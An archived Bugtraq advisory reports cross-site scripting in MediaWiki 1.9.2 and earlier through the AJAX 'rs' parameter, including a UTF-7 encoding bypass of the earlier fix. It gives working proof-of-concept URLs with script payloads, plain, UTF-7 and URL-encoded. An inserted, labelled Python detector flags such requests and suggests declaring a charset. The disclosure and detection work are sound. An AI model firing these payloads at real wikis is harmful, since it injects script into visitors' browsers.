Bugtraq mailing list archives

MediaWiki Cross-site Scripting


From: eyal () BugSec com
Date: 20 Feb 2007 04:29:01 -0000

MediaWiki Cross-site Scripting Vulnerabilities


Date:
18/02/2007

Vendor:
MediaWiki

Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.

Description:
MediaWiki v1.8.2 and below are vulnerable to a plain Cross-site scripting attack by exploiting the experimental AJAX
features, if enabled (default). This XSS was fixed in post-1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). That
fix can be bypassed by encoding the XSS payload in UTF-7. Note: the browser's encoding auto-detection has to be enabled for
successful exploitation.


Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions. 

Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
v1.8.3 - v1.9.2:
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D
(the same UTF-7 payload, URL encoded)
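The following detection logic is an added example for defenders and is not part of the advisory or of MediaWiki's own code. It walks a few constructed request paths shaped like the ones above (the callback host is replaced by a placeholder), decodes the `rs` parameter the way a browser would (percent-decoding, then an optional UTF-7 pass) and flags any view that contains a script tag. The assumption that a legitimate `rs` value is a bare function name is the example's own, not a statement from the advisory.

```python
import re
from urllib.parse import unquote

# Constructed sample request paths (not real traffic). The first is a benign
# AJAX call; the other three mirror the request shapes the advisory describes,
# with the callback host replaced by a placeholder.
SAMPLE_REQUESTS = [
    "/wiki/index.php?action=ajax&rs=wfAjaxWatch&rsargs[]=Main_Page",
    "/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://example.invalid')%3C/script%3E",
    "/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://example.invalid');+ADw-/SCRIPT+AD4-",
    "/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D",
]

SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)
# Assumption made for this example: a legitimate 'rs' value is a bare function name.
PLAIN_IDENTIFIER = re.compile(r"^[A-Za-z0-9_]+$")


def query_params(path):
    """Split a request path's query string, percent-decoding each part.

    Deliberately avoids parse_qs/unquote_plus: those turn '+' into a space,
    and '+' is exactly the byte that opens a UTF-7 shift sequence.
    """
    if "?" not in path:
        return {}
    params = {}
    for pair in path.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def decoded_views(value):
    """Return the text a browser could see after each decoding step."""
    views = {"percent_decoded": value}
    try:
        # A browser that auto-detects UTF-7 would render the value this way.
        views["utf7"] = value.encode("ascii").decode("utf-7")
    except (UnicodeEncodeError, UnicodeDecodeError):
        pass  # non-ASCII input or malformed shift sequence: no UTF-7 view
    return views


def classify(path):
    """Label one request: not_ajax, benign, suspicious_rs or xss:<view>."""
    params = query_params(path)
    if params.get("action") != "ajax" or "rs" not in params:
        return "not_ajax"
    rs = params["rs"]
    for view_name, text in decoded_views(rs).items():
        if SCRIPT_TAG.search(text):
            return "xss:" + view_name
    if not PLAIN_IDENTIFIER.match(rs):
        return "suspicious_rs"
    return "benign"


if __name__ == "__main__":
    for request_path in SAMPLE_REQUESTS:
        print(classify(request_path), request_path)
```

Two points worth keeping in mind when adapting this to real logs: percent-decode with `unquote`, not `unquote_plus` or `parse_qs`, because a decoder that maps `+` to a space silently destroys every UTF-7 shift sequence and the check will never fire; and remember that the reason browser auto-detection matters at all is that the response carries no explicit character set, so on the server side the durable fix is to declare one (for example `Content-Type: text/html; charset=UTF-8`) on every AJAX response rather than to blocklist encodings in requests.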


Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24
